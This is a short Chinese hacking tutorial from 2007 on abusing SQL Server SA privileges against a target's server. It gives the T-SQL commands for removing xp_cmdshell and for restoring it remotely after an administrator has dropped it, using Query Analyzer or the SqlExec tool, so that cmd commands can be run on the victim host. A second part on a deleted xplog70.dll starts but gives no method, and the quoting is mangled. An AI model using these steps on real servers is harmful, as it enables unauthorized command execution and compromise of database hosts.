打印本文 打印本文 关闭窗口 关闭窗口
SQL Server SA权限总结经典技术
作者:武汉SEO闵涛  文章来源:敏韬网  点击数911  更新时间:2007/11/14 13:11:15  文章录入:mintao  责任编辑:mintao
 SQL Server SA权限总结经典技术    
 
 前提需要工具:SQL Query Analyzer和SqlExec Sunx Version
  
  第一部分:
  
  有关去掉xp_cmdshell来保护系统的分析总结:
  首先知道一下语句:
  1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
  if exists (select * from dbo.sysobjects where id=object_id(N''''[dbo].[xpcmdshell]'''') and OBJECTPROPERTY(id,N''''IsExtendedProc'''')=1)exec sp_dropextendedproc N''''[dbo].[xp_cmdshell]''''
  2.添加xp_cmdshell扩展过程的方法是使用如下语句:
  sp_addextendedproc xp_cmdshell,@dllname=''''xplog70.dll''''
  现在看看现象:
  我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。
  
  现在来看看被去掉xp_cmdshell后恢复的两种方法:
  
  方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便sp_addextendedproc xp_cmdshell,@dllname=''''xplog70.dll''''方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc ''''xp_cmdshell'''',''''xpsql70.dll''''或者对Sql2000情况下使用sp_addextendedproc ''''xp_cmdshell'''',''''xplog70.dll''''另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样,然后输入sp_dropextendedproc ''''xp_cmdshell''''就可以了
  
  第二部分:
  
  假如对方已经把xplog70.dll删除或者改了名,我们来用下面的方法继续我们的hack任务:
  
  当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。
  
  在查询分析器中写入sp_addextendedproc xp_cmdshell,@dllname=''''xplog70.dll''''提示数据库中已存在名为''''xp_cmdshell''''的对象。

打印本文 打印本文 关闭窗口 关闭窗口